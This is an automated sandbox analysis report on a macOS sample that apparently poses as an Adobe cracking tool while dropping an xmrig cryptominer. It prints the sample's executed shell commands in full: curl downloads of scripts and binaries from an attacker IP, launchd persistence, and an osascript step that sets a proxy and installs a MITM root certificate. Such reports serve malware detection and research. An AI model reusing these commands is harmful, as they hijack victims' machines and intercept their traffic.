Joe Sandbox Cloud Pro Analysis Report

Loading ...

Analysis Report TnrhsyteX1

Overview

General Information

Joe Sandbox Version:25.0.0 Fire Opal
Analysis ID:65439
Start date:10.12.2018
Start time:11:17:39
Joe Sandbox Product:Cloud
Overall analysis duration:0h 5m 7s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:TnrhsyteX1 (renamed file extension from none to app)
Cookbook file name:defaultmacfilecookbook.jbs
Analysis system description:Mac Mini, High Sierra 10.13.2 (MS Office 16.9, Java 1.8.0_25)
Detection:MAL
Classification:mal80.troj.evad.mine.macAPP@0/136@2/0
Warnings:
Show All
  • Report size exceeded maximum capacity and may have missing behavior information.

Detection

StrategyScoreRangeReportingDetection
Threshold800 - 100Report FP / FNmalicious

Classification

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid AccountsAppleScript3Hidden Files and Directories1Launch Daemon1Hidden Files and Directories1Credential DumpingProcess Discovery11AppleScript3Data from Local SystemData Encrypted2Uncommonly Used Port2
Replication Through Removable MediaScripting21Launch Agent1Accessibility FeaturesScripting21Network SniffingSystem Information Discovery31Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Cryptographic Protocol1
Drive-by CompromiseUser Execution1Launch Daemon1Path InterceptionFile Deletion1Input CaptureQuery RegistryWindows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Non-Application Layer Protocol5
Exploit Public-Facing ApplicationScheduled TaskSystem FirmwareDLL Search Order HijackingCode Signing1Credentials in FilesSystem Network Configuration DiscoveryLogon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol15

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for dropped fileShow sources
Source: /Users/Shared/xmrigAvira: Label: PUA/OSX.CoinMiner.kaotz
Imports the Security library (often used for certificate, key, keychain, or secure transport handling)Show sources
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security

Bitcoin Miner:

barindex
Detected Stratum mining protocolShow sources
Source: global trafficTCP traffic: 192.168.0.50:49249 -> 37.187.163.200:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"42b3n6qxhhyfofahm3bwfuetgewht16f7em7mzxcfxo66jtfsfzcpkm6uabw4dxpqievd4bp51pglsd8rqzfjc3dtsu5vcf","pass":"monerominer12343:goodnews420@yandex.com","agent":"xmrig/2.8.3 (macintosh; intel mac os x) libuv/1.24.0 clang/9.1.0","algo":["cn","cn/2","cn/1","cn/0","cn/xtl","cn/msr","cn/xao","cn/rto"]}}.
Source: global trafficTCP traffic: 192.168.0.50:49257 -> 37.187.163.200:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"42b3n6qxhhyfofahm3bwfuetgewht16f7em7mzxcfxo66jtfsfzcpkm6uabw4dxpqievd4bp51pglsd8rqzfjc3dtsu5vcf","pass":"monerominer12343:goodnews420@yandex.com","agent":"xmrig/2.8.3 (macintosh; intel mac os x) libuv/1.24.0 clang/9.1.0","algo":["cn","cn/2","cn/1","cn/0","cn/xtl","cn/msr","cn/xao","cn/rto"]}}.

Networking:

barindex
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.0.50:49236 -> 46.226.108.171:4444
Source: global trafficTCP traffic: 192.168.0.50:49249 -> 37.187.163.200:3333
Uses known network protocols on non-standard portsShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49236 -> 4444
Source: unknownNetwork traffic detected: HTTP traffic on port 4444 -> 49236
Source: unknownNetwork traffic detected: HTTP traffic on port 49237 -> 4444
Source: unknownNetwork traffic detected: HTTP traffic on port 4444 -> 49237
Source: unknownNetwork traffic detected: HTTP traffic on port 49238 -> 4444
Source: unknownNetwork traffic detected: HTTP traffic on port 4444 -> 49238
Source: unknownNetwork traffic detected: HTTP traffic on port 49239 -> 4444
Source: unknownNetwork traffic detected: HTTP traffic on port 4444 -> 49239
Source: unknownNetwork traffic detected: HTTP traffic on port 49246 -> 4444
Source: unknownNetwork traffic detected: HTTP traffic on port 4444 -> 49246
Source: unknownNetwork traffic detected: HTTP traffic on port 49247 -> 4444
Source: unknownNetwork traffic detected: HTTP traffic on port 4444 -> 49247
Source: unknownNetwork traffic detected: HTTP traffic on port 49248 -> 4444
Source: unknownNetwork traffic detected: HTTP traffic on port 4444 -> 49248
Source: unknownNetwork traffic detected: HTTP traffic on port 49250 -> 4444
Source: unknownNetwork traffic detected: HTTP traffic on port 4444 -> 49250
Writes shell scripts with functionality to modify network settingsShow sources
Source: /usr/bin/curl (PID: 560)File written: /private/tmp/uploadminer.sh
Source: /usr/bin/curl (PID: 596)File written: /private/tmp/uploadminer.shJump to dropped file
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Source: unknownTCP traffic detected without corresponding DNS query: 46.226.108.171
Executes the "networksetup" command used to configure network settingsShow sources
Source: /bin/sh (PID: 567)Networksetup executable: /usr/sbin/networksetup -> networksetup -setsecurewebproxy Wi-Fi 46.226.108.171 8080Jump to behavior
Source: /bin/sh (PID: 569)Networksetup executable: /usr/sbin/networksetup -> networksetup -setwebproxy Wi-Fi 46.226.108.171 8080Jump to behavior
Source: /bin/sh (PID: 603)Networksetup executable: /usr/sbin/networksetup -> networksetup -setsecurewebproxy Wi-Fi 46.226.108.171 8080Jump to behavior
Source: /bin/sh (PID: 605)Networksetup executable: /usr/sbin/networksetup -> networksetup -setwebproxy Wi-Fi 46.226.108.171 8080Jump to behavior
Downloads compressed data via HTTPShow sources
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 10 Dec 2018 10:18:52 GMTServer: Apache/2.4.18 (Ubuntu)Last-Modified: Wed, 07 Nov 2018 12:14:18 GMTETag: "6a815e-57a120ebaeeee"Accept-Ranges: bytesContent-Length: 6979934Content-Type: application/zipData Raw: 50 4b 03 04 0a 00 00 00 00 00 89 50 5e 4b 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 10 00 73 61 6d 70 6c 65 2e 61 70 70 2f 55 58 0c 00 f6 d6 e2 5b f2 ce f6 59 f7 01 14 00 50 4b 03 04 0a 00 00 00 00 00 89 50 5e 4b 00 00 00 00 00 00 00 00 00 00 00 00 14 00 10 00 73 61 6d 70 6c 65 2e 61 70 70 2f 43 6f 6e 74 65 6e 74 73 2f 55 58 0c 00 f6 d6 e2 5b f2 ce f6 59 f7 01 14 00 50 4b 03 04 0a 00 00 00 00 00 89 50 5e 4b 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 10 00 73 61 6d 70 6c 65 2e 61 70 70 2f 43 6f 6e 74 65 6e 74 73 2f 4d 61 63 4f 53 2f 55 58 0c 00 f6 d6 e2 5b f2 ce f6 59 f7 01 14 00 50 4b 03 04 14 00 08 00 08 00 89 50 5e 4b 00 00 00 00 00 00 00 00 00 00 00 00 23 00 10 00 73 61 6d 70 6c 65 2e 61 70 70 2f 43 6f 6e 74 65 6e 74 73 2f 4d 61 63 4f 53 2f 41 64 6f 62 65 20 5a 6
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /sample.zip HTTP/1.1Host: 46.226.108.171User-Agent: curl/7.54.0Accept: */*
Source: global trafficHTTP traffic detected: GET /login/process.php HTTP/1.1Accept-Encoding: identityHost: 46.226.108.171:4444Cookie: session=Uy3r/62UwT8t7hOk1wN8uCOC4Vk=Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global trafficHTTP traffic detected: GET /news.php HTTP/1.1Accept-Encoding: identityHost: 46.226.108.171:4444Cookie: session=FG19agq3LNl5N2MHdDr0MRKAZ24=Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global trafficHTTP traffic detected: GET /uploadminer.sh HTTP/1.1Host: 46.226.108.171User-Agent: curl/7.54.0Accept: */*
Source: global trafficHTTP traffic detected: GET /com.apple.rig.plist HTTP/1.1Host: 46.226.108.171User-Agent: curl/7.54.0Accept: */*
Source: global trafficHTTP traffic detected: GET /com.apple.rig.plist HTTP/1.1Host: 46.226.108.171User-Agent: curl/7.54.0Accept: */*
Source: global trafficHTTP traffic detected: GET /com.proxy.initialize.plist HTTP/1.1Host: 46.226.108.171User-Agent: curl/7.54.0Accept: */*
Source: global trafficHTTP traffic detected: GET /config.json HTTP/1.1Host: 46.226.108.171User-Agent: curl/7.54.0Accept: */*
Source: global trafficHTTP traffic detected: GET /xmrig HTTP/1.1Host: 46.226.108.171User-Agent: curl/7.54.0Accept: */*
Source: global trafficHTTP traffic detected: GET /news.php HTTP/1.1Accept-Encoding: identityHost: 46.226.108.171:4444Cookie: session=SYDFioywtcFbUR5U3EST96SbqVk=Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global trafficHTTP traffic detected: GET /admin/get.php HTTP/1.1Accept-Encoding: identityHost: 46.226.108.171:4444Cookie: session=hbR4wlsbQec60C56VlkryZf6BKM=Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global trafficHTTP traffic detected: GET /uploadminer.sh HTTP/1.1Host: 46.226.108.171User-Agent: curl/7.54.0Accept: */*
Source: global trafficHTTP traffic detected: GET /com.apple.rig.plist HTTP/1.1Host: 46.226.108.171User-Agent: curl/7.54.0Accept: */*
Source: global trafficHTTP traffic detected: GET /com.proxy.initialize.plist HTTP/1.1Host: 46.226.108.171User-Agent: curl/7.54.0Accept: */*
Source: global trafficHTTP traffic detected: GET /config.json HTTP/1.1Host: 46.226.108.171User-Agent: curl/7.54.0Accept: */*
Source: global trafficHTTP traffic detected: GET /xmrig HTTP/1.1Host: 46.226.108.171User-Agent: curl/7.54.0Accept: */*
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: ptpb.pw
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /admin/get.php HTTP/1.1Accept-Encoding: identityContent-Length: 1902Host: 46.226.108.171:4444Content-Type: application/x-www-form-urlencodedConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoData Raw: e8 89 cd c1 d3 ad c4 b5 5c 28 42 c8 7e c2 54 d9 98 09 c9 d3 38 1c f3 4d 93 09 d7 13 ac 35 a7 d0 13 e4 84 73 b1 c4 30 a4 8a 82 14 2b 21 ab b9 24 3a 60 57 67 4d 22 13 04 9f 74 ab b1 7e 54 a4 8e 0b 8c a4 a3 bf 3c 3c 22 ad 30 ad 83 29 31 f6 36 c1 f5 9b a8 62 ed 27 16 ce 3f 3c a1 4a f1 d4 e7 2d 1f a1 69 5f e8 a2 b6 0f 60 a2 85 ac 78 db 4d b3 3c 3a 36 d4 a9 ef 74 fa 49 a6 d1 c3 a0 b4 88 ee 5f d0 df 8e 80 24 4d 33 29 fd 02 da 56 7c 0c d9 21 2a 95 72 5b 4a 0d ca d7 7b f0 bc db 00 a0 f1 e0 23 bc 75 c3 c6 fe bd e7 b2 ad 4a 2d 92 15 cb 07 40 5e 42 b5 30 fe a7 8f 05 2d 99 f8 a0 bb 03 b8 32 bf 38 e1 02 0b 41 8d 5f 96 bd 6b 3b e8 5f 89 f5 2c 5e a3 1c 56 0b 12 19 e3 cc cb 4a 9a f1 97 de aa 5a d0 1c ed ad 0d d9 c8 c8 44 5a 2a 84 04 05 6b fa 79 2c 60 18 08 9f 9b 7f
Reads from file descriptors related to (network) socketsShow sources
Source: /usr/bin/curl (PID: 549)Reads from socket in process: dataJump to behavior
Source: /Users/Shared/./xmrig (PID: 593)Reads from socket in process: dataJump to behavior
Source: /Users/Shared/./xmrig (PID: 617)Reads from socket in process: dataJump to behavior
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49235
Source: unknownNetwork traffic detected: HTTP traffic on port 49235 -> 443
Writes from file descriptors related to (network) socketsShow sources
Source: /usr/bin/curl (PID: 549)Writes from socket in process: dataJump to behavior
Source: /Users/Shared/./xmrig (PID: 593)Writes from socket in process: dataJump to behavior
Source: /Users/Shared/./xmrig (PID: 617)Writes from socket in process: dataJump to behavior

System Summary:

barindex
Classification labelShow sources
Source: classification engineClassification label: mal80.troj.evad.mine.macAPP@0/136@2/0

Data Obfuscation:

barindex
Imports the Security library (often used for certificate, key, keychain, or secure transport handling)Show sources
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security

Persistence and Installation Behavior:

barindex
Executes the "rm" command used to delete files or directoriesShow sources
Source: /bin/sh (PID: 590)Rm executable: /bin/rm -> rm -rf ./xmrig2Jump to behavior
Source: /bin/sh (PID: 591)Rm executable: /bin/rm -> rm -rf ./config2.jsonJump to behavior
Source: /bin/sh (PID: 615)Rm executable: /bin/rm -> rm -rf ./xmrig2Jump to behavior
Source: /bin/sh (PID: 616)Rm executable: /bin/rm -> rm -rf ./config2.jsonJump to behavior
Many shell processes execute programs via execve syscall (may be indicative of malicious behavior)Show sources
Source: /bin/sh (PID: 554)Shell process: ps -efJump to behavior
Source: /bin/sh (PID: 555)Shell process: grep Little SnitchJump to behavior
Source: /bin/sh (PID: 556)Shell process: grep -v grepJump to behavior
Source: /bin/sh (PID: 557)Shell process: id -uJump to behavior
Source: /bin/sh (PID: 558)Shell process: ps 550Jump to behavior
Source: /bin/sh (PID: 560)Shell process: curl -o uploadminer.sh http://46.226.108.171/uploadminer.shJump to behavior
Source: /bin/sh (PID: 561)Shell process: chmod +x ./uploadminer.shJump to behavior
Source: /bin/sh (PID: 563)Shell process: osascript -e do shell script 'networksetup -setsecurewebproxy Wi-Fi 46.226.108.171 8080 && networksetup -setwebproxy Wi-Fi 46.226.108.171 8080 && curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pem' with administrator privilegesJump to behavior
Source: /bin/sh (PID: 567)Shell process: networksetup -setsecurewebproxy Wi-Fi 46.226.108.171 8080Jump to behavior
Source: /bin/sh (PID: 568)Shell process: /bin/cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.oldJump to behavior
Source: /bin/sh (PID: 569)Shell process: networksetup -setwebproxy Wi-Fi 46.226.108.171 8080Jump to behavior
Source: /bin/sh (PID: 570)Shell process: /bin/cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.oldJump to behavior
Source: /bin/sh (PID: 571)Shell process: curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pemJump to behavior
Source: /bin/sh (PID: 574)Shell process: curl -o com.apple.rig.plist http://46.226.108.171/com.apple.rig.plistJump to behavior
Source: /bin/sh (PID: 575)Shell process: curl -o com.proxy.initialize.plist http://46.226.108.171/com.proxy.initialize.plistJump to behavior
Source: /bin/sh (PID: 576)Shell process: launchctl load -w com.apple.rig.plistJump to behavior
Source: /bin/sh (PID: 578)Shell process: launchctl load -w com.proxy.initialize.plistJump to behavior
Source: /bin/sh (PID: 580)Shell process: curl -o config.json http://46.226.108.171/config.jsonJump to behavior
Source: /bin/sh (PID: 581)Shell process: curl -o xmrig http://46.226.108.171/xmrigJump to behavior
Source: /bin/sh (PID: 589)Shell process: chmod +x ./xmrigJump to behavior
Source: /bin/sh (PID: 590)Shell process: rm -rf ./xmrig2Jump to behavior
Source: /bin/sh (PID: 591)Shell process: rm -rf ./config2.jsonJump to behavior
Source: /bin/sh (PID: 593)Shell process: ./xmrig -c config.jsonJump to behavior
Source: /bin/sh (PID: 583)Shell process: ps -efJump to behavior
Source: /bin/sh (PID: 584)Shell process: grep Little SnitchJump to behavior
Source: /bin/sh (PID: 585)Shell process: grep -v grepJump to behavior
Source: /bin/sh (PID: 587)Shell process: id -uJump to behavior
Source: /bin/sh (PID: 588)Shell process: ps 579Jump to behavior
Source: /bin/sh (PID: 596)Shell process: curl -o uploadminer.sh http://46.226.108.171/uploadminer.shJump to behavior
Source: /bin/sh (PID: 597)Shell process: chmod +x ./uploadminer.shJump to behavior
Source: /bin/sh (PID: 599)Shell process: osascript -e do shell script 'networksetup -setsecurewebproxy Wi-Fi 46.226.108.171 8080 && networksetup -setwebproxy Wi-Fi 46.226.108.171 8080 && curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pem' with administrator privilegesJump to behavior
Source: /bin/sh (PID: 603)Shell process: networksetup -setsecurewebproxy Wi-Fi 46.226.108.171 8080Jump to behavior
Source: /bin/sh (PID: 604)Shell process: /bin/cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.oldJump to behavior
Source: /bin/sh (PID: 605)Shell process: networksetup -setwebproxy Wi-Fi 46.226.108.171 8080Jump to behavior
Source: /bin/sh (PID: 606)Shell process: /bin/cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.oldJump to behavior
Source: /bin/sh (PID: 607)Shell process: curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pemJump to behavior
Source: /bin/sh (PID: 608)Shell process: curl -o com.apple.rig.plist http://46.226.108.171/com.apple.rig.plistJump to behavior
Source: /bin/sh (PID: 609)Shell process: curl -o com.proxy.initialize.plist http://46.226.108.171/com.proxy.initialize.plistJump to behavior
Source: /bin/sh (PID: 610)Shell process: launchctl load -w com.apple.rig.plistJump to behavior
Source: /bin/sh (PID: 611)Shell process: launchctl load -w com.proxy.initialize.plistJump to behavior
Source: /bin/sh (PID: 612)Shell process: curl -o config.json http://46.226.108.171/config.jsonJump to behavior
Source: /bin/sh (PID: 613)Shell process: curl -o xmrig http://46.226.108.171/xmrigJump to behavior
Source: /bin/sh (PID: 614)Shell process: chmod +x ./xmrigJump to behavior
Source: /bin/sh (PID: 615)Shell process: rm -rf ./xmrig2Jump to behavior
Source: /bin/sh (PID: 616)Shell process: rm -rf ./config2.jsonJump to behavior
Source: /bin/sh (PID: 617)Shell process: ./xmrig -c config.jsonJump to behavior
Changes permissions of written Mach-O filesShow sources
Source: /usr/bin/unzip (PID: 592)Permissions modified for written 64-bit Mach-O /Users/henry/sample/sample.app/Contents/MacOS/Adobe Zii: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /usr/bin/unzip (PID: 592)Permissions modified for written FAT Mach-O /Users/henry/sample/sample.app/Contents/Resources/v9.bundle/Versions/A/Resources/libConfigurer.dylib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /usr/bin/unzip (PID: 592)Permissions modified for written FAT Mach-O /Users/henry/sample/sample.app/Contents/Resources/v9.bundle/Versions/A/amtlib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /usr/bin/unzip (PID: 592)Permissions modified for written FAT Mach-O /Users/henry/sample/sample.app/Contents/Resources/v9ME.bundle/Versions/A/Resources/libConfigurer.dylib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /usr/bin/unzip (PID: 592)Permissions modified for written FAT Mach-O /Users/henry/sample/sample.app/Contents/Resources/v9ME.bundle/Versions/A/amtlib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /usr/bin/unzip (PID: 592)Permissions modified for written FAT Mach-O /Users/henry/sample/sample.app/Contents/Resources/v10.bundle/Versions/A/Resources/libConfigurer.dylib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /usr/bin/unzip (PID: 592)Permissions modified for written FAT Mach-O /Users/henry/sample/sample.app/Contents/Resources/v10.bundle/Versions/A/amtlib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /usr/bin/unzip (PID: 592)Permissions modified for written 64-bit Mach-O /Users/henry/sample/sample.app/Contents/Resources/v10ME.bundle/Versions/A/Resources/libConfigurer.dylib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /usr/bin/unzip (PID: 592)Permissions modified for written FAT Mach-O /Users/henry/sample/sample.app/Contents/Resources/v10ME.bundle/Versions/A/amtlib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /usr/bin/unzip (PID: 592)Permissions modified for written FAT Mach-O /Users/henry/sample/sample.app/Contents/Resources/v6.bundle/Versions/A/amtlib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Creates application bundlesShow sources
Source: /usr/bin/unzip (PID: 592)Bundle Info.plist file created: sample/sample.app/Contents/Info.plistJump to behavior
Creates hidden files, links and/or directoriesShow sources
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/MacOS/._Adobe ZiiJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/._MacOSJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/._AdobeIcon.pngJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/._ResourcesJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/Versions/A/._CodeResourcesJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/Versions/A/_CodeSignature/._CodeResourcesJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/Versions/A/.__CodeSignatureJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/Versions/A/Resources/._libConfigurer.dylibJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/Versions/A/Resources/._Info.plistJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/Versions/A/._ResourcesJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/Versions/A/._amtlibJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/Versions/._AJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/Versions/._CurrentJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/._VersionsJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/._amtlibJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/._v9.bundleJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/._AppIcon.icnsJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/Base.lproj/._MainMenu.nibJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/._Base.lprojJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/._ResourcesJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/Versions/A/_CodeSignature/._CodeResourcesJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/Versions/A/.__CodeSignatureJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/Versions/A/Resources/._libConfigurer.dylibJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/Versions/A/Resources/._Info.plistJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/Versions/A/._ResourcesJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/Versions/A/._amtlibJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/Versions/._AJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/Versions/._CurrentJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/._VersionsJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/._amtlibJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/._v9ME.bundleJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/._ResourcesJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/Versions/A/_CodeSignature/._CodeResourcesJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/Versions/A/.__CodeSignatureJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/Versions/A/Resources/._libConfigurer.dylibJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/Versions/A/Resources/._Info.plistJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/Versions/A/._ResourcesJump to behavior
